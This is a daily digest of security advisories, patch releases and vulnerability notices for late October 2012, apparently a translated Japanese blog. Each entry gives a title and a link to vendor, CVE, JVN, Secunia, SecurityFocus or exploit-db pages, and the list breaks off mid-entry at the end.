Wednesday, October 31, 2012

Wednesday the 31st (rokuyō: Senshō)

+ RHSA-2012:1416 Critical: kdelibs security update
http://rhn.redhat.com/errata/RHSA-2012-1416.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4512
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4513

+ CESA-2012:1413 Important CentOS 6 thunderbird Update
http://lwn.net/Alerts/522061/

+ CESA-2012:1413 Important CentOS 5 thunderbird Update
http://lwn.net/Alerts/522062/

+ UPDATE: HPSBUX02824 SSRT100970 rev.2 - HP-UX Running Java, Remote Execution of Arbitrary Code, and Other Vulnerabilities
https://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c03533078-2%257CdocLocale%253Dja_JP%257CcalledBy%253D&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken

+ Multiple vulnerabilities in Adobe Flashplayer
https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_adobe_flashplayer5
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0724
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0725
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0768
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0769
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0772
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0773

nginx-1.3.8 development version released
http://nginx.org/en/download.html

Check Point response to PASTEBIN claim that Check Point Firewalls are vulnerable to simple SYN flooding
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk86721&src=securityAlerts

Notice of Critical Patch release for a cross-site request forgery (CSRF) vulnerability in InterScan Messaging Security products
http://www.trendmicro.co.jp/support/news.asp?id=1849

ウイルスバスター2012 クラウド (Virus Buster 2012 Cloud) program update notice
http://www.trendmicro.co.jp/support/news.asp?id=1846

Samba 4.0.0rc4 Available for Download
https://download.samba.org/pub/samba/rc/WHATSNEW-4-0-0rc4.txt

IPA Technical Watch
Messages sent from free webmail accounts on the rise: trends and case analysis of recent targeted attack e-mails
(Some examples skip disguising the attachment altogether and deliberately send it as a plain .exe file)
http://www.ipa.go.jp/about/technicalwatch/20121030.html

From security labs around the world
"PE_MUSTAN.A" malware exploits weak passwords
http://itpro.nikkeibp.co.jp/article/COLUMN/20121029/433143/?ST=security

Vulnerability information worth checking <2012.10.30>
http://itpro.nikkeibp.co.jp/article/COLUMN/20121029/433141/?ST=security

Fake data-entry screens on the online banking sites of three major banks; cause is a virus
Displayed after login to the legitimate site, aimed at stealing PINs and similar credentials
http://itpro.nikkeibp.co.jp/article/NEWS/20121030/433523/?ST=security

[security bulletin] HPSBUX02825 SSRT100974 rev.1 - HP-UX Running Java, Remote Indirect Vulne
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00142.html

[SECURITY] [DSA 2569-1] icedove security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00141.html

Cyber Security Awareness Month - Day 30 - DSD 35 mitigating controls
http://isc.sans.edu/diary.html?storyid=14419

Hurricane Sandy Update
http://isc.sans.edu/diary.html?storyid=14410

VU#408099 CA ARCserve Backup authentication service denial-of-service vulnerability
http://www.kb.cert.org/vuls/id/408099

VU#936363 CA ARCserve Backup opcode 0x7a RWSList remote code execution vulnerability
http://www.kb.cert.org/vuls/id/936363

VU#207540 TomatoCart with PayPal Express Checkout design flaw vulnerability
http://www.kb.cert.org/vuls/id/207540

WordPress Slideshow Plugin Multiple Script Insertion Vulnerabilities
http://secunia.com/advisories/51135/

CorePlayer "callback" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/51108/

D-Link Wireless N300 Cloud Router CAPTCHA Processing Buffer Overflow Vulnerability
http://secunia.com/advisories/51075/

Debian update for icedove
http://secunia.com/advisories/51105/

Ubuntu update for thunderbird
http://secunia.com/advisories/51121/

Red Hat update for thunderbird
http://secunia.com/advisories/51123/

TYPO3 Formhandler Extension Cross-Site Scripting and SQL Injection Vulnerabilities
http://secunia.com/advisories/51116/

EMC Avamar Client for VMware "root" Password Disclosure Security Issue
http://secunia.com/advisories/51130/

SUSE update for MozillaFirefox, MozillaThunderbird, xulrunner, and seamonkey
http://secunia.com/advisories/51127/

Wordpress FoxyPress Plugin Multiple Vulnerabilities
http://cxsecurity.com/issue/WLB-2012100257

appRain CMF 0.1.5 Cross Site Scripting / SQL Injection
http://cxsecurity.com/issue/WLB-2011120002

mPDF 5.3 File Disclosure
http://cxsecurity.com/issue/WLB-2011120011

DotA OpenStats 1.3.9 SQL Injection
http://cxsecurity.com/issue/WLB-2011120001

DATA Estudio SQL Injection & Cross-Site Scripting Vulnerabilities
http://cxsecurity.com/issue/WLB-2012100256

Art Creative CMS SQL Injection
http://cxsecurity.com/issue/WLB-2012100255

TP-LINK TL-WR841N Local File Inclusion
http://cxsecurity.com/issue/WLB-2012100254

REMOTE: HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
http://www.exploit-db.com/exploits/22305

REMOTE: HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow
http://www.exploit-db.com/exploits/22306

REMOTE: Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF
http://www.exploit-db.com/exploits/22301

DoS/PoC: hMailServer 5.3.3 IMAP Remote Crash PoC
http://www.exploit-db.com/exploits/22302

DoS/PoC: Microsoft Windows Help program (WinHlp32.exe) Crash PoC
http://www.exploit-db.com/exploits/22303

DoS/PoC: Microsoft Office Publisher 2010 Crash PoC
http://www.exploit-db.com/exploits/22310

Oracle Java SE CVE-2012-5089 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56059

Mozilla Firefox/Thunderbird/SeaMonkey 'defaultValue()' Security Bypass Vulnerability
http://www.securityfocus.com/bid/56155

KDE Konqueror Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55879

Computer Associates ARCserve Backup Remote Code Execution and Denial of Service Vulnerabilities
http://www.securityfocus.com/bid/56116

Drupal Core Arbitrary PHP Code Execution and Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/56103

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4194 Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56301

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4196 Cross-Origin Security Bypass Vulnerability
http://www.securityfocus.com/bid/56306

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4195 Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56302

RETIRED: Microsoft Windows Help Viewer Memory Corruption Denial of Service Vulnerability
http://www.securityfocus.com/bid/56303

Invision Power Board 'core.php' Unspecified Security Vulnerability
http://www.securityfocus.com/bid/56288

Dokuwiki 'index.php' Path Disclosure Vulnerability
http://www.securityfocus.com/bid/56328

Citrix XenServer CVE-2012-4606 Local Privilege Escalation Vulnerability
http://www.securityfocus.com/bid/55432

DokuWiki 'ns' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/54439

Django 'HttpRequest.get_host()' Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56146

Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56285

MapServer Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/48720

MapServer Map File Double Free Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/49374

Oracle Java SE CVE-2012-5074 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56056

Oracle Java SE CVE-2012-3143 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56055

Wordpress Slideshow Plugin Multiple HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/56335

TomatoCart PayPal Express Checkout Module Security Bypass Vulnerability
http://www.securityfocus.com/bid/56333

WordPress Foxypress Plugin Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/56332

Real Networks RealPlayer '.3g2' File Write Access Violation Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56329

Tuesday, October 30, 2012

Tuesday the 30th (rokuyō: Shakkō)


+ RHSA-2012:1413 Important: thunderbird security update
http://rhn.redhat.com/errata/RHSA-2012-1413.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4194
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4196

+ CESA-2012:1407 Critical CentOS 6 firefox Update
http://lwn.net/Alerts/521899/

+ CESA-2012:1407 Critical CentOS 5 firefox Update
http://lwn.net/Alerts/521902/

+ Thunderbird 16.0.2 released
http://www.mozilla.org/en-US/thunderbird/16.0.2/releasenotes/

+ Samba 3.6.9 Available for Download
http://www.samba.org/samba/history/samba-3.6.9.html

+ Microsoft Office Excel 2010 Memory Corruption Denial of Service Vulnerability
http://www.securityfocus.com/bid/56304

Check Point response to 'Check Point Firewalls vulnerable to simple SYN flooding'
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk86721&src=securityAlerts

Advisory: SafeGuard Configuration Protection - a tool to avoid potential issues after upgrading clients running Sophos Anti-Virus has now been released
http://www.sophos.com/en-us/support/knowledgebase/118461.aspx

Yahoo (US) announces it will ignore IE10's default "Do Not Track" setting
http://itpro.nikkeibp.co.jp/article/NEWS/20121029/433292/?ST=security

US state of South Carolina: personal information of millions of people leaked
http://itpro.nikkeibp.co.jp/article/NEWS/20121029/433289/?ST=security

JVNDB-2012-005156 Denial-of-service (application crash) vulnerability in the libpng_plugin of VideoLAN VLC media player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005156.html

JVNDB-2012-005155 Denial-of-service (daemon crash) vulnerability in Wing FTP Server
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005155.html

JVNDB-2012-005154 Vulnerability in Citrix Cloud.com CloudStack and Apache CloudStack pre-release allowing arbitrary API calls
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005154.html

JVNDB-2012-005153 SQL injection vulnerability in mnoGoSearch
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005153.html

JVNDB-2012-005152 SQL injection vulnerability in user.php of Social Network Community
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005152.html

JVNDB-2012-005151 Double-free vulnerability in the FlashPix PlugIn for IrfanView
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005151.html

JVNDB-2012-005150 SQL injection vulnerability in Seotoaster
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005150.html

JVNDB-2012-005149 SQL injection vulnerability in the Forum module of appRain CMF
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005149.html

JVNDB-2012-005148 Cross-site scripting vulnerability in the Search module of appRain CMF
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005148.html

JVNDB-2012-005147 Cross-site request forgery vulnerability in the Sentinel plugin for WordPress
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005147.html

JVNDB-2012-005146 Cross-site scripting vulnerability in the Sentinel plugin for WordPress
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005146.html

JVNDB-2012-005145 SQL injection vulnerability in the Sentinel plugin for WordPress
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005145.html

JVNDB-2012-005144 SQL injection vulnerability in rub2_w.php of PHP Flirt-Projekt
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005144.html

JVNDB-2012-005143 Cross-site scripting vulnerability in templates/default/Admin/Login.html of PHP-SCMS
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005143.html

JVNDB-2012-005142 Directory traversal vulnerability in examples/show_code.php of mPDF
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005142.html

JVNDB-2012-005141 SQL injection vulnerability in DotA OpenStats
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005141.html

JVNDB-2012-005140 SQL injection vulnerability in the SCORM Cloud For WordPress plugin for WordPress
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005140.html

JVNDB-2012-005139 SQL injection vulnerability in index.php of Video Community Portal
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005139.html

JVNDB-2012-005138 Cross-site scripting vulnerability in BrowserCRM
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005138.html

JVNDB-2012-005137 SQL injection vulnerability in BrowserCRM
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005137.html

JVNDB-2012-005136 Heap-based buffer overflow vulnerability in Cisco WebEx Recording Format Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005136.html

JVNDB-2012-005135 Buffer overflow vulnerability in Cisco WebEx Recording Format Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005135.html

JVNDB-2012-005134 Buffer overflow vulnerability in Cisco WebEx Recording Format Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005134.html

JVNDB-2012-005133 Buffer overflow vulnerability in Cisco WebEx Recording Format Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005133.html

JVNDB-2012-005132 Buffer overflow vulnerability in Cisco WebEx Recording Format Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005132.html

JVNDB-2012-005131 Buffer overflow vulnerability in Cisco WebEx Recording Format Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005131.html

Call for Papers: DIMVA 2013
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00140.html

PIAF H.M.S - SQL Injection
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00139.html

[slackware-security] mozilla-firefox (SSA:2012-300-01)
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00135.html

KmPlayer v3.0.0.1440 Local Crash PoC
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00138.html

[SECURITY] [DSA 2568-1] rtfm security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00134.html

[SECURITY] [DSA 2567-1] request-tracker3.8 security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00133.html

Exploit - EasyITSP by Lemens Telephone Systems 2.0.2
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00137.html

EMC Avamar Client for VMware Sensitive Information Disclosure Vulnerability
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00136.html

Cyber Security Awareness Month - Day 29 - Clear Desk: The Unacquainted Standard
http://isc.sans.edu/diary.html?storyid=14404

EMC Avamar Client for VMware Discloses Server Password to Local Users
http://www.securitytracker.com/id/1027705

Internet Explorer 8 XSS filter bypass
http://cxsecurity.com/issue/WLB-2012100253

Multiple Browsers Cross-Site Scripting via redirectors 301 and 303
http://cxsecurity.com/issue/WLB-2012100010

Opera 12.02 Local files disclosure (0day)
http://cxsecurity.com/issue/WLB-2012100252

Opera 12.02 (UXSS) Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100086

Opera 12.10b Cross Site Scripting 0day PoC (CSRF) *youtube
http://cxsecurity.com/issue/WLB-2012100119

SilverStripe CMS 2.4.7 <= Persistent Cross Site Scripting Vulnerability
http://cxsecurity.com/issue/WLB-2012100251

SilverStripe CMS 2.4.7 <= Arbitrary URL Redirection
http://cxsecurity.com/issue/WLB-2012100250

Microsoft Paint 5.1 Memory Corruption
http://cxsecurity.com/issue/WLB-2012100249

Microsoft Windows Help Program Memory Corruption
http://cxsecurity.com/issue/WLB-2012100248

hMailServer 5.3.3 Remote Denial Of Service
http://cxsecurity.com/issue/WLB-2012100247

Arora 0.10.0 Windows Qt 4.5.3 DLL Hijack
http://cxsecurity.com/issue/WLB-2012100246

Aladdin Knowledge System Ltd. Active-X Buffer Overflow
http://cxsecurity.com/issue/WLB-2012100234

Aladdin Knowledge System Ltd Buffer Overflow
http://cxsecurity.com/issue/WLB-2012100245

ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection
http://cxsecurity.com/issue/WLB-2012100244

HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
http://cxsecurity.com/issue/WLB-2012100243

HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow
http://cxsecurity.com/issue/WLB-2012100242

Debian update for request-tracker3.8
http://secunia.com/advisories/51112/

Ubuntu update for exim4
http://secunia.com/advisories/51153/

Debian update for rtfm
http://secunia.com/advisories/51111/

Debian update for exim4
http://secunia.com/advisories/51115/

SUSE update for exim
http://secunia.com/advisories/51155/

Oracle Business Intelligence Cross-Site Scripting Vulnerability
http://secunia.com/advisories/51151/

Ubuntu update for openjdk-6
http://secunia.com/advisories/51154/

Ubuntu update for firefox
http://secunia.com/advisories/51147/

Red Hat update for firefox
http://secunia.com/advisories/51146/

SAP NetWeaver Process Integration XML External Entity Vulnerability
http://secunia.com/advisories/51152/

Mozilla Firefox / Thunderbird / SeaMonkey "Location" Object Multiple Vulnerabilities
http://secunia.com/advisories/51144/

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3986 Multiple Security Bypass Vulnerabilities
http://www.securityfocus.com/bid/55922

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3990 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56131

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4186 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56135

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4179 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56129

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-4188 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56123

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-3982 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55924

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-4180 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56126

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4182 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/56121

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3991 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55930

PLIB 'ssgParser.cxx' Remote Stack Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55839

SafeNet Privilege 'PrivAgent.ocx' ActiveX Controls Multiple Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/56297

Linux Kernel Multiple Local Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/46616

Linux Kernel 'i915_gem_execbuffer.c' Multiple Integer Overflow Vulnerabilities
http://www.securityfocus.com/bid/53971

PostgreSQL 'xml_parse()' Function Arbitrary File Access Vulnerability
http://www.securityfocus.com/bid/55074

PostgreSQL 'xslt_process()' Function Arbitrary File Creation or Overwrite Vulnerability
http://www.securityfocus.com/bid/55072

Browser CRM Multiple SQL Injection and Cross Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/51060

Oracle Business Intelligence Enterprise Edition CVE-2012-1686 Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56026

ICCLIB CVE-2012-4405 Out-of-Bounds Memory Write Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/55494

VLC Media Player 'get_chunk_header()' Function Memory Corruption Vulnerability
http://www.securityfocus.com/bid/51147

libfpx 'Free_All_Memory()' Function Double Free Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/51131

IrfanView TIFF Image File Remote Heap Based Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/51132

ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/55522

Linux Kernel SFC Driver CVE-2012-3412 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/54763

GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/54982

ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
http://www.securityfocus.com/bid/54658

libexif Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/54437

Todd Miller Sudo Insecure Temporary File Creation Vulnerability
http://www.securityfocus.com/bid/54868

Video Community Portal 'id' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/51108

Social Network Community 'userID' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/51107

PHP-SCMS 'lang' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/51062

Enterasys Network Management Suite 'nssyslogd.exe' Component Stack Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/51124

Seotoaster Multiple SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/51077

mnoGoSearch Unspecified SQL Injection Vulnerability
http://www.securityfocus.com/bid/51113

WebSVN 'path' Parameter Multiple Cross Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/51109

WordPress SCORM Cloud Plugin 'ajax.php' Multiple SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/49484

DotA OpenStats 'id' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/51110

Cacti Multiple Input Validation Vulnerabilities
http://www.securityfocus.com/bid/51048

Hitachi JP1/ServerConductor/DeploymentManager Directory Traversal Vulnerability
http://www.securityfocus.com/bid/51079

Sentinel Plugin for WordPress Cross Site Scripting and Cross Site Request Forgery Vulnerabilities
http://www.securityfocus.com/bid/51089

Flirt-Projekt 'rub' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/51106

appRain CMF Cross Site Scripting and SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/51105

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4194 Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56301

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4195 Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56302

HP Operations Agent Multiple Remote Code Execution Vulnerabilities
http://www.securityfocus.com/bid/54362

ManageEngine Security Manager Plus Advanced Search SQL Injection Vulnerability
http://www.securityfocus.com/bid/56138

Bcfg2 'Trigger' Plugin Remote Command Injection Vulnerability
http://www.securityfocus.com/bid/54217

Drupal Arbitrary PHP Code Execution and Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/56103

Linux Kernel 'uname()' System Call Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55855

phpMyAdmin CVE-2012-5339 Multiple HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/55925

phpMyAdmin CVE-2012-5368 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55939

Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
http://www.securityfocus.com/bid/47736

Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56285

Endpoint Protector Multiple HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/56323

TP-LINK TL-WR841N Router Local File Include Vulnerability
http://www.securityfocus.com/bid/56320

EMC Avamar Client for VMware Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56317

cgit 'syntax-highlighting.sh' Remote Command Injection Vulnerability
http://www.securityfocus.com/bid/56315

libunity-webapps Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56314

Mozilla Firefox/SeaMonkey/Thunderbird CVE-2012-4196 Cross-Origin Security Bypass Vulnerability
http://www.securityfocus.com/bid/56306

Microsoft Office Excel 2010 Memory Corruption Denial of Service Vulnerability
http://www.securityfocus.com/bid/56304

Monday, October 29, 2012

Monday the 29th (rokuyō: Taian)


+ Critical: firefox security update
http://rhn.redhat.com/errata/RHSA-2012-1407.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4194
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4196

+ MFSA 2012-90 Fixes for Location object issues
http://www.mozilla.org/security/announce/2012/mfsa2012-90.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4194
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4196

+ Firefox 16.0.2 released
http://www.mozilla.org/en-US/firefox/16.0.2/releasenotes/

+ Linux kernel 3.6.4, 3.4.16, 3.0.49 released
http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.6.4
http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.4.16
http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.0.49

String of incidents worldwide involving credit card POS terminals (WIRED.jp)
http://itpro.nikkeibp.co.jp/article/NEWS/20121029/433183/?ST=security

Trend Micro releases three free apps for Windows 8, including lost-device protection
http://itpro.nikkeibp.co.jp/article/NEWS/20121029/433145/?ST=security

Bank of Tokyo-Mitsubishi UFJ warns of new virus that steals information at online banking login
http://itpro.nikkeibp.co.jp/article/NEWS/20121027/433081/?ST=security

JVN#00322303 Cross-site scripting vulnerability in 東京BBS (Tokyo BBS)
http://jvn.jp/jp/JVN00322303/index.html

JVNDB-2011-002305 Chosen-plaintext attack vulnerability in the CBC mode of SSL and TLS
http://jvndb.jvn.jp/ja/contents/2011/JVNDB-2011-002305.html

JVNDB-2012-003222 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003222.html

JVNDB-2012-003221 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003221.html

JVNDB-2012-003220 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003220.html

JVNDB-2012-003219 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003219.html

JVNDB-2012-003218 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003218.html

JVNDB-2012-003217 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003217.html

JVNDB-2012-003216 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003216.html

JVNDB-2012-003215 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003215.html

JVNDB-2012-003214 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003214.html

JVNDB-2012-003213 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003213.html

JVNDB-2012-003212 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003212.html

JVNDB-2012-003223 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003223.html

JVNDB-2012-003224 Vulnerability in Oracle Outside In Technology of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003224.html

JVNDB-2012-004886 Message forgery vulnerability in Eduserv OpenAthens for Java
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004886.html

JVNDB-2012-004866 Denial-of-service (named daemon hang) vulnerability in ISC BIND
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004866.html

JVNDB-2012-005130 (JVNVU#268267) Issues in multiple DomainKeys Identified Mail (DKIM) implementations
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005130.html

JVNDB-2012-000093 (JVN#00322303) Cross-site scripting vulnerability in 東京BBS (Tokyo BBS)
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-000093.html

JVNDB-2012-005129 Denial-of-service (DoS) vulnerability in Excel 2007 of Microsoft Office 2007 and in Microsoft Excel Viewer
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005129.html

JVNDB-2012-005128 Cross-site scripting vulnerability in phpMyAdmin
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005128.html

JVNDB-2012-005127 Cross-site scripting vulnerability in phpMyAdmin
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005127.html

JVNDB-2012-005126 Vulnerability in Apache Open For Business Project
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005126.html

JVNDB-2012-005125 (JVNVU#225404) Access restriction flaw in HP/H3C and Huawei network devices
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005125.html

Inventory 1.0 Multiple XSS Vulnerabilities
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00132.html

Inventory 1.0 Multiple SQL Vulnerabilities
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00131.html

[SECURITY] [DSA 2566-1] exim4 security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00130.html

[security bulletin] HPSBHF02819 SSRT100920 rev.2 - HP, 3COM, and H3C Routers & Switches, Rem
